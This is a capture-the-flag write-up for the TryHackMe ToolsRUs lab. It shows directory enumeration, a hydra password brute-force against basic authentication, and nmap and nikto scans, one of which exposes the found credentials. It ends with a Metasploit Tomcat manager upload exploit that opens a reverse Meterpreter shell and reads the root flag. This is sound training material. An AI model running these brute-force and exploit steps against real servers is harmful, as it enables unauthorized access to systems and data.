TryHackMe - ToolsRUs

This is a writeup to the ToolsRus Room on The goal is to practice using dirbuster, hydra, nmap, nikto and metasploit. The challenge is to use the tools to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine.

  • What directory can you find, that begins with a “g”?
    • Use dirbuster with the directory-list-lowercase-2.3-medium.txt wordlist and find the guidelines directory.
  • Whose name can you find from this directory?
    • Inside that directory is a message: “Hey bob, did you update that TomCat server?”
  • What directory has basic authentication?
    • Eventually the “protected” directory shows up in dirbuster.
  • What is bob’s password to the protected part of the website?
      kali@kali:~$ hydra -l bob -P rockyou.txt http-get /protected
      [DATA] attacking http-get://
      [80][http-get] host:   login: bob   password: <censored>
      1 of 1 target successfully completed, 1 valid password found
      Hydra ( finished at 2020-11-16 00:54:44
  • What other port that serves a web service is open on the machine? Going to the service running on that port, what is the name and version of the software? What version of Apache-Coyote is this service using? What version of Apache-Coyote is this service using?
      kali@kali:~$ nmap -A
      22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
      | ssh-hostkey: 
      |   2048 a1:d2:2d:75:f2:94:5d:c2:51:b4:21:4f:8a:6a:b3:f2 (RSA)
      |   256 7e:c6:52:14:6f:b1:3c:eb:42:21:4c:b1:6e:79:32:f3 (ECDSA)
      |_  256 2e:95:75:35:15:2e:67:82:2c:98:4a:c3:9d:e3:ec:55 (ED25519)
      80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
      |_http-server-header: Apache/2.4.18 (Ubuntu)
      |_http-title: Site doesn't have a title (text/html).
      1234/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
      |_http-favicon: Apache Tomcat
      |_http-server-header: Apache-Coyote/1.1
      |_http-title: Apache Tomcat/7.0.88
      8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
      |_ajp-methods: Failed to get a valid response for the OPTION request
      Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above. ``` kali@kali:~$ nikto -host -id bob:bubbles
    • Nikto v2.1.6 —————————————————————————
    • Target IP:
    • Target Hostname:
    • Target Port: 1234
    • Start Time: 2020-11-16 01:08:20 (GMT-5) —————————————————————————
    • Server: Apache-Coyote/1.1 … ```
  • How many documentation files did Nikto identify?
    • Nikto took a very long time, but eventually discovered 5 files.
  • Use Metasploit to exploit the service and get a shell on the system. What user did you get a shell as, and what text is in the file /root/flag.txt?
      $ msfconsole -q
      msf5 > search name:tomcat type:exploit
      ... # tried out multiple exploits, eventually found one that worked
      ... # set options based on previously found username:password and RPORT
      msf5 exploit(multi/http/tomcat_mgr_upload) > run
      [*] Started reverse TCP handler on 
      [*] Retrieving session ID and CSRF token...
      [*] Uploading and deploying ycK4cqc...
      [*] Executing ycK4cqc...
      [*] Sending stage (53944 bytes) to
      [*] Undeploying ycK4cqc ...
      [*] Meterpreter session 1 opened ( -> at 2020-11-16 01:24:34 -0500
      meterpreter > shell
      Process 1 created.
      Channel 1 created.
      cat /root/flag.txt